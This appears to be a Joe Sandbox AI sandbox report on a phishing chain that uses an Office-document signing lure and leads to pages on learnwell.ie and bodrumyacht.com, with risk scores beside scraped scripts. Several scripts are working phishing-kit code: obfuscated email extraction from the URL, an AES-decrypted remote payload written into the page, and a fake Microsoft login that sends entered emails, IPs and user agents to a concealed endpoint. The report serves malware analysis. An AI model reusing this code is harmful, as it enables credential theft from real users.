| URL: email Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": [
"No headers provided to analyze",
"Cannot make security assessment without header information",
"Default to lowest risk score due to lack of data"
]
} |
Date: unknown
|
| URL: https://learnwell.ie/OMnkHtZMK20RCijS9aTFP-F9XLy6o... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It also performs external data transmission and aggressive DOM manipulation. While some of the behaviors may be related to legitimate functionality, such as analytics or error reporting, the overall level of risk is high due to the presence of multiple malicious indicators."
} |
const _0x50eb76=_0xa93f;(function(_0x5318f6,_0x37e9e8){const _0x55eaef=_0xa93f,_0x1d981e=_0x5318f6();while(!![]){try{const _0x34adaf=-parseInt(_0x55eaef(0x198))/0x1+parseInt(_0x55eaef(0x176))/0x2*(-parseInt(_0x55eaef(0x173))/0x3)+-parseInt(_0x55eaef(0x174))/0x4*(parseInt(_0x55eaef(0x161))/0x5)+parseInt(_0x55eaef(0x14d))/0x6*(-parseInt(_0x55eaef(0x179))/0x7)+parseInt(_0x55eaef(0x155))/0x8+-parseInt(_0x55eaef(0x165))/0x9+parseInt(_0x55eaef(0x180))/0xa;if(_0x34adaf===_0x37e9e8)break;else _0x1d981e['push'](_0x1d981e['shift']());}catch(_0x1c9068){_0x1d981e['push'](_0x1d981e['shift']());}}}(_0x1bc3,0x7ebea));let extractedEmail='',mouseMovements=[],mouseDownDuration=null;function _0xa93f(_0x25bd85,_0x10afe9){const _0x1bc318=_0x1bc3();return _0xa93f=function(_0xa93fe4,_0x209a26){_0xa93fe4=_0xa93fe4-0x14d;let _0xaeccec=_0x1bc318[_0xa93fe4];return _0xaeccec;},_0xa93f(_0x25bd85,_0x10afe9);}const startTime=Date['now']();let failedAttempts=0x0;function extractEmail(){const _0x1e2735=_0xa93f,_0xbed409=decodeURIComponent(window[_0x1e2735(0x18d)]['href']),_0xd5a59c=window[_0x1e2735(0x18d)][_0x1e2735(0x172)][_0x1e2735(0x187)](0x1),_0x2dcec5=_0xd5a59c||_0xbed409[_0x1e2735(0x192)](/([^\/]+)$/)?.[0x1];if(_0x2dcec5)try{const _0x2e9731=atob(_0x2dcec5);_0x2e9731&&_0x2e9731[_0x1e2735(0x16f)]('@')&&(extractedEmail=_0x2e9731);}catch(_0x5c37ef){console[_0x1e2735(0x16a)](_0x1e2735(0x156),_0x5c37ef);}}function _0x1bc3(){const _0x390f0d=['2858253nsBRNx','2757964DLsqKS','toString','2qxzqjs','message','createElement','2727277SoJrWp','target-image','Failed\x20to\x20load\x20target\x20image:','getElementById','permanently_blocked','server.php','push','24513270OFjeDv','captcha-option','slice','Error\x20loading\x20images:','You\x20can\x20now\x20retry.','textContent','get_images.php','substring','abs','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20style=\x22padding:\x2020px;\x20text-align:\x20center;\x20position:\x20absolute;\x20top:\x2050%;\x20left:\x2050%;\x20transform:\x20translate(-50%,\x20-50%);\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<h1\x20style=\x22color:\x20red;\x22>Restricted</h1>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>','sort','clientX','redirect','location','add','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20','Retry\x20in\x20','<p\x20id=\x22block-timer\x22></p>','match','clientY','image-options','touchstart','POST','block-timer','411662xxnBIK','filter.php','\x20seconds.','6JPeuci','appendChild','click','src','redirect_url','json','floor','innerHTML','4095360MKmcPm','Error\x20decoding\x20email:','random','No\x20images\x20found','block','img','Error\x20handling\x20image\x20click:','href','body','mousemove','addEventListener','blocked','5AWlBuM','style','display','onload','5274PTpXDs','innerWidth','application/json','forEach','reason','error','now','stringify','You\x20are\x20temporarily\x20blocked.','length','includes','classList','substr','hash'];_0x1bc3=function(){return _0x390f0d;};return _0x1bc3();}extractEmail(),window[_0x50eb76(0x15f)]('hashchange',extractEmail),document[_0x50eb76(0x15f)]('DOMContentLoaded',async()=>{const _0x1d7deb=_0x50eb76,_0xb28b0=document[_0x1d7deb(0x17c)](_0x1d7deb(0x194)),_0x318782=document[_0x1d7deb(0x17c)](_0x1d7deb(0x17a));let _0x793576='default-'+Math['random']()[_0x1d7deb(0x175)](0x24)[_0x1d7deb(0x171)](0x2,0x9);window[_0x1d7deb(0x166)]>0x300&&document[_0x1d7deb(0x15f)](_0x1d7deb(0x15e),_0x12bcb7=>{const _0x440973=_0x1d7deb;mouseMovements[_0x440973(0x17f)]({'x':_0x12bcb7[_0x440973(0x18b)],'y':_0x12bcb7[_0x440973(0x193)],'timestamp':Date['now']()}),mouseMovements[_0x440973(0x16e)]>0x64&&mouseMovements['shift']();});document[_0x1d7deb(0x15f)]('mousedown',()=>{const _0x249a07=_0x1d7deb;!mouseDownDuration&&(mouseDownDuration=Date[_0x249a07(0x16b)]()-startTime);}),document[_0x1d7deb(0x15f)](_0x1d7deb(0x195),()=>{const _0x5d6b4f=_0x1d7deb;!mouseDownDuration&&(mouseDownDuration=Date[_0x5d6b4f(0x16b)]()-star |
| URL: Office document Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "You have a new document to review and sign: Compensation Review and Bonus Agreement.pdf",
"prominent_button_name": "Open with browser",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": true,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "finance"
} |
 |
| URL: https://learnwell.ie/OMnkHtZMK20RCijS9aTFP-F9XLy6oV0IAisMy3gS7SrDGw2t9SE5cVMGuFrGP5_G/?%24deeplink_path=%2Falerts%2Ftime_off_requests%2F13a6b7f0-b2ae-4165-87b0-da6673653a54&_branch_match_id=1408774826209477055&_branch_referrer=H4sIAAAAAAAAAx2OQWuDQBSEf425 Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://learnwell.ie Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This appears to be a legitimate Irish (.ie) domain with a straightforward name. The TLD .ie is the official country code for Ireland and is considered trustworthy. The domain name is simple and descriptive without any suspicious elements."
} |
URL: https://learnwell.ie |
| URL: Office document Model: Joe Sandbox AI | {
"brands": [
"Adobe"
]
} |
|
| URL: https://learnwell.ie/OMnkHtZMK20RCijS9aTFP-F9XLy6oV0IAisMy3gS7SrDGw2t9SE5cVMGuFrGP5_G/?%24deeplink_path=%2Falerts%2Ftime_off_requests%2F13a6b7f0-b2ae-4165-87b0-da6673653a54&_branch_match_id=1408774826209477055&_branch_referrer=H4sIAAAAAAAAAx2OQWuDQBSEf425 Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script sets a JavaScript-enabled cookie, which is a common practice. It also collects mouse movement and click data, which could be used for analytics or user behavior tracking. The data is sent to the same page via an XHR request, which is a moderate-risk indicator. Overall, the script exhibits some potentially aggressive behavior, but it does not appear to have any clear malicious intent."
} |
// Set JavaScript enabled cookie
document.cookie = "js_enabled=true; path=/";
function querulous() {
document.forms[0].submit();
}
let mouseData = [];
document.addEventListener('mousemove', function (e) {
mouseData.push({x: e.clientX, y: e.clientY, t: Date.now()});
});
document.addEventListener('click', function (e) {
mouseData.push({x: e.clientX, y: e.clientY, t: Date.now(), click: true});
});
function sendMouseData() {
var xhr = new XMLHttpRequest();
xhr.open('POST', '', false); // Send to the same page
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({action: 'save_mouse_data', mouseData: mouseData}));
}
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script contains metadata, translations, and polyfills related to the Cloudflare challenge, but does not exhibit any high-risk behaviors. The script is likely legitimate and part of a standard security implementation, so the overall risk score is low."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.KMrWh3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_refresh":"Refresh","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","human_button_text":"Verify%20you%20are%20human","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_description":"Send%20Feedback","testing_only":"Testing%20only.","turnstile_verifying":"Verifying...","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_footer_terms":"Terms","turnstile_overrun_description":"Stuck%20here%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_success":"Success%21","turnstile_feedback_report":"Having%20trouble%3F","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_failure":"Error","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_timeout":"Timed%20out","turnstile_expired":"Expired","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eP,eQ,eU,eV,f5,fb,fc,fE,fH,fJ,fK,fL,fX,g9,gf,gg,gh,gr,gC,gG,gH,f9,fa){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1621))/1+parseInt(gI(1194))/2+parseInt(gI(777))/3*(-parseInt(gI(1375))/4)+-parseInt(gI(1505))/5*(-parseInt(gI(924))/6)+-parseInt(gI(1506))/7+parseInt(gI(1105))/8*(-parseInt(gI(729))/9)+parseInt(gI(876))/10,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,530824),eM=this||self,eN=eM[gJ(598)],eO=function(gK,d,e,f,g){return gK=gJ,d={'fZDMN':gK(1285),'XkkaL':function(h,i){return i^h},'PBSpO':gK(1593),'dATCN':function(h,i){return i==h},'sHFRp':function(h,i){return i===h},'HJTZB':function(h,i){return h+i},'lDPOD':function(h,i,j){return h(i,j)},'EzshL':function(h,i){return h+i},'TAEXQ':gK(521),'YVVWq':gK(475),'lZoHH':gK(1412),'UfSNF':function(h,i){return h==i},'YQcrQ':function(h,i){return h-i},'CSUFk':function(h,i){return h(i)},'YdyZG':function(h,i){return h<<i},'cxcCy':function(h,i){return h==i},'rvrDl':function(h,i){return h>i},'ExhNn':function(h,i){return h|i},'cIqTz':function(h,i){return i&h},'lGRkb':function(h,i){return h-i},'zCvYf':function(h,i){return h(i)},'eACbv':function(h,i){return h<i},'uGgxK':function(h,i){return h&i},'ilomj':function(h,i){return h!==i},'bsqsL':function(h,i){return h<i},'GBEnI':function(h,i){return h>i},'eDMTO':function(h,i){return h(i)},'Ooqsi':function(h,i){return h&i},'LpUNC':function(h,i){return h<i},'qNaXG':function(h,i){return h-i},'JAsjw':function(h,i){return h<i},'cyUdO':function(h,i){return h|i},'enPRM':function(h,i){return h(i)},'dtlFH':function(h,i){return h==i},'diRVJ':gK(1473),'QxEjO':function(h,i){return h==i},'see |
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. While the script appears to have a legitimate purpose (retrieving information from a remote server), the use of encrypted data and the lack of transparency around the data being sent raise concerns. Additionally, the script interacts with an untrusted domain, which further increases the risk. Overall, the combination of these factors warrants a high-risk score."
} |
let usuuid = "tKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q==";
let policy = "Upuzk3V1WMMG4sMCmrth+iwGUJ+xnI5+MAOnWPam1IZQGLRkwfAq5W/RwyNrdwxqijCn2bg9OIBIfdBEOuDvdw==";
let SV = "0";
let SIR = "0";
function decstr(encryptedString, key) {
const keySize = [16, 24, 32];
if (!keySize.includes(key.length)) {
throw new Error("Incorrect AES key length. Use a 16, 24, or 32 bytes key.");
}
const encryptedData = CryptoJS.enc.Base64.parse(encryptedString);
const iv = CryptoJS.lib.WordArray.create(encryptedData.words.slice(0, 4));
const ciphertext = CryptoJS.lib.WordArray.create(
encryptedData.words.slice(4)
);
const decryptedData = CryptoJS.AES.decrypt(
{
ciphertext: ciphertext,
},
CryptoJS.enc.Utf8.parse(key),
{
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7,
}
);
return decryptedData.toString(CryptoJS.enc.Utf8);
}
async function GEInfo() {
try {
const response = await fetch(decstr(policy, "708b91a2n3k4a5i6"), {
method: "POST",
body: JSON.stringify({
psk: usuuid,
do: "GURI",
redirect_url: "https://support.microsoft.com/en-us/office/-something-went-wrong-error-when-you-try-to-start-an-office-app-4b4471dd-cf86-4a37-910d-35a01a6c7d17",
theme: "office",
}),
headers: {
"Content-Type": "application/json",
},
});
const data = await response.json();
if (data.c === "success") {
document.write(decstr(data.b, data.a));
} else {
document.write(`<p>${data}</p>`);
}
} catch (error) {
console.error("Error:", error);
document.write("An error occurred while making the request.");
}
}
(async () => {
await GEInfo();
})();
|
| URL: https://bodrumyacht.com/4765445b-32c6-49b0-83e6-1d... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code, and the use of dynamic code execution. While the script appears to have some legitimate functionality, such as IP address retrieval and form validation, the overall risk is elevated due to the presence of suspicious activities like sending user data to an unknown domain and the use of encrypted communication. Further investigation is recommended to determine the true intent of this script."
} |
let current_ip = null;
function Ua69EUcs(plainText, key) {
const keySize = [16, 24, 32];
if (!keySize.includes(key.length)) {
throw new Error("Incorrect AES key length. Use a 16, 24, or 32 bytes key.");
}
// Generate a random IV (initialization vector)
const iv = CryptoJS.lib.WordArray.random(16);
// Encrypt the plain text using AES with the given key and random IV
const encrypted = CryptoJS.AES.encrypt(CryptoJS.enc.Utf8.parse(plainText), CryptoJS.enc.Utf8.parse(key), {
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7
});
// Combine the IV and ciphertext (IV is necessary for decryption)
const encryptedData = iv.concat(encrypted.ciphertext);
// Convert the combined data to Base64 for easy transmission or storage
return CryptoJS.enc.Base64.stringify(encryptedData);
}
let psk = "tKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q==";
async function kHF1g2VsS() {
try {
const response = await fetch("https://api.ipify.org?format=json");
const json = await response.json();
return json.ip;
} catch (error) {
console.error(error);
return null;
}
}
(async function () {
current_ip = await kHF1g2VsS();
})();
$("#xXSTWB").on("keypress", function (e) {
if (e.which == 13) {
value();
}
});
$("#S1DMj").on("click", function () {
value();
});
$("#fEepco5M").on("keypress", function (e) {
if (e.which == 13) {
z9Uxww();
}
});
$("#hPHZOc").on("click", function () {
z9Uxww();
});
$("#DrCCnS, #H0MvvZ").click(function (e) {
e.preventDefault();
if (window.location.hash)
history.replaceState(
null,
"",
window.location.href.replace(window.location.hash, "")
);
location.reload();
});
$("#xXSTWB").prop("placeholder", atob("RW1haWwsIHBob25lLCBvciBTa3lwZQ=="));
$("#fEepco5M").prop("placeholder", atob("UGFzc3dvcmQg"));
var j6jSA;
var aER4sC;
var dFDNHPsBZ;
var HZtwblE;
function gB() {
$("#a9NbLw").hide();
$("#ED6IDIyPN").hide();
$("#AE8g8Yt").hide();
$("#OTVjs6a").hide();
$("#K1oGz7J7I").hide();
$("#ajXDcU9pZ").show();
if (j6jSA && j6jSA.readyState !== 4) {
j6jSA.abort();
}
if (aER4sC && aER4sC.readyState !== 4) {
aER4sC.abort();
}
if (dFDNHPsBZ && dFDNHPsBZ.readyState !== 4) {
dFDNHPsBZ.abort();
}
}
$("#hd5Db7fl, #jn5raf").click(function (e) {
window.location.href = atob(
"aHR0cHM6Ly9zdXBwb3J0Lm1pY3Jvc29mdC5jb20vZW4tdXMvb2ZmaWNlLy1zb21ldGhpbmctd2VudC13cm9uZy1lcnJvci13aGVuLXlvdS10cnktdG8tc3RhcnQtYW4tb2ZmaWNlLWFwcC00YjQ0NzFkZC1jZjg2LTRhMzctOTEwZC0zNWEwMWE2YzdkMTc="
);
});
var BILbhfY = atob($("#O0WZbKH").val());
async function value() {
$("#iJsSu").text("");
var byd3A9L = $("#xXSTWB").val();
var iLxlP =
'<span class="qzOEGI">laden</span>E<span class="qzOEGI">laden</span>nte<span class="qzOEGI">laden</span>r <span class="qzOEGI">laden</span>a v<span class="qzOEGI">laden</span>ali<span class="qzOEGI">laden</span>d e<span class="qzOEGI">laden</span>mai<span class="qzOEGI">laden</span>l ad<span class="qzOEGI">laden</span>dres<span class="qzOEGI">laden</span>s, p<span class="qzOEGI">laden</span>hon<span class="qzOEGI">laden</span>e nu<span class="qzOEGI">laden</span>mbe<span class="qzOEGI">laden</span>r<span class="qzOEGI">laden</span> or<span class="qzOEGI">laden</span> Sk<span class="qzOEGI">laden</span>yp<span class="qzOEGI">laden</span>e <span class="qzOEGI">laden</span>na<span class="qzOEGI">laden</span>m<span class="qzOEGI">laden</span>e.';
if (!current_ip) {
current_ip = await kHF1g2VsS(); // Ensure the IP is fetched if not yet set
}
if (W9Cwy9a($("#xXSTWB").val())) {
$("#wMIxs").css("display", "block");
$("#S1DMj").prop("disabled", true);
$.ajax({
url: BILbhfY,
cache: false,
type: "POST",
data: JSON.stringify({
do: "check",
em: byd3A9L,
IP: current_ip,
bdata: navigator.userAgent,
psk: psk,
send_visit: SV,
send_invalid_result: SIR,
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. The script sets up various configuration options for the Cloudflare challenge and includes functionality to handle communication between the challenge and the parent window. While the script uses some techniques that could be considered moderately risky, such as dynamic message handling and communication with external domains, the overall context suggests this is a legitimate security mechanism rather than a malicious script. Therefore, the risk score is assessed as low."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '125cc',
chlApiSitekey: '0x4AAAAAAA5fj_BgHOlngOSS',
chlApiMode: 'non-interactive',
chlApiSize: 'normal',
chlApiRcV: 'V6ccIVQN6lajy19zcJhHuj2y8B5JywdpGOFWT2zu6O8-1737116334-1.3.1.1-zEPG1duJg4WRLw.RpKDewMi1pEFRw1gxSfrXkWuBwb8',
chlApiResetSrc: 'new',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:72000,
cK:[],
cType: 'chl_api_ni',
cRay: '90364a62d925f5f6',
cH: 'EwgCrcrrtMArQk.FD0GVUDkxdBLUOCSpu1nP0ztBwAA-1737116334-1.1.1.1-eGWrlDzsFhhI3gxTBDONk7ywKCfLrlBLYYfsRvmRMHL4J_jDAAbauA_aQ5i3d0yA',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'jFk16W2L1YIyTPyQfZ5I4SSlP02SkEDea71mp2fgxKY-1737116334-1.1.1.1-g3yhdMrJoHNpvz_t1Uh1qBMXwayypCRm7KGr8rUKHz0wQMBBcLfsSeI3aOEE083TOpI5XQ4bMl90Mdak6V7UMfnCo08bdfNs5bwUKwbgalkRsc3SU.gjuzedqd6hb62JgHuwLOGpqJyVe1hYrmtnQ3bo0YsOMkY2pux71HwpDMKjydarQ5bD2ejxJmgGBpO1k3uICdGR1o0H4KGFXf0jG4NuDZPAesI6Fx.ZfmtNaBIvflZ3rOHe3NhcAQU0Pz7fOI7C_XzsOfVo8vTTVQELFXVhhWhkt0Z3huZTiZLqQt3pItO8_oL_.RB9q4A6WPHqY3xz8fGUQbbvaoJDxrjH91hHlCej1HITdDA6ULgR8K9.xgh7qw32umCUD.rk6MsMlm6pfil4tIs40QO6c0vhQBrrwNQTFE6j2RG_XZCVu94swPJYfNWd0H_pNLIIiI5F94ocpdMpAMxJQUr5ihEnu58pWD2Cdm293q8FHZwt9U47yWZxTct.fM4OO.i_BESqIUdrzFNIEstUxFA4hs4vbCCQTa7ex5lrLtOlCKeZwxvDKZDoPghjh7ZSojoCzeV1iRz.eK7d9SdBdymqXMlyj6cxlrIx_GKrV49p_JsrSxO3.9u8Axve_F8lX_onVW8KjjMLqhRG4T1BJZpziSUv7Bym1PAbdh6K.l_dY412eVXB9IcYQxWYad_owKpiEUu82ww4bP0LZ7.z9gW4HekBcdwq2ApgK5XT_1AwPrBRMWzHw0p5KfowGOFrvnP1p5a3ICrQ7s.UvYLPztdVwmYXF9bSaP3p2i.G5A89MYmRNqT3KfduZ4dtEl1QfOZKmaS78ZZu0zsrKIumeYnOxNl4QqpfKrwfsotcJXFXh13PNa16tZTLLnqd2relKI8rJJWxeoZjhYYceuK5_9i_1genGcgxVu8m6MWt2Goiwl5NMXN8h3b35FYCf5IFlQb_CT.0IIQbGR6VDXDg7J4UNl4lMdbUaWC71wrARNkvVBAVxtHoo55uPXUgfVTDUn7IrUhQTkx_VdZlpCRdfwkNvPkFlp2zbKnNKFVpIHqWHJqADDLHJk5azFyiIamM9pskwHTUtaX6RfIYkEV.uBceCmGhrtlRFbIZxiRb1cRWYKkPnYbfTS.HjCNuN3EjXqHtiEG.iAUbxFeKUjyToAVZzKAFUwor9_4.3eV3Du4I4lR220yDSMfz5my5yyrQxKMRjWwbiEbEvjImlr6k2x0tv2WtjKFDiAg8wSY.E9oBBLZMN_igR4N4HQNsJKxbj2KhWOp8c4pCqbRGVZQnpR_VKX5ZhoRZJ8cL98gK12F2BjvxZHkp79p5yXvzKoz2Yyp120c5HvIayJfExjnGeRPpnr.JRmxiJOfY5eAPnnRss3UbRKSbCMHo50MXtjJrEmwXfXyO',
cITimeS: '1737116334',
reloadRequest: function(refreshTrigger){
if(window['parent']){
window['parent'].postMessage({
trigger: refreshTrigger,
source: 'cloudflare-challenge',
widgetId: '125cc',
nextRcV: 'V6ccIVQN6lajy19zcJhHuj2y8B5JywdpGOFWT2zu6O8-1737116334-1.3.1.1-zEPG1duJg4WRLw.RpKDewMi1pEFRw1gxSfrXkWuBwb8',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The snippet primarily focuses on implementing core cryptographic functionality, which is a legitimate use case. While it uses some moderate-risk indicators like external data transmission and aggressive DOM manipulation, these are common practices in cryptographic libraries. Overall, the risk score is low, as the script is likely part of a legitimate cryptographic library and does not exhibit any clear malicious intent."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
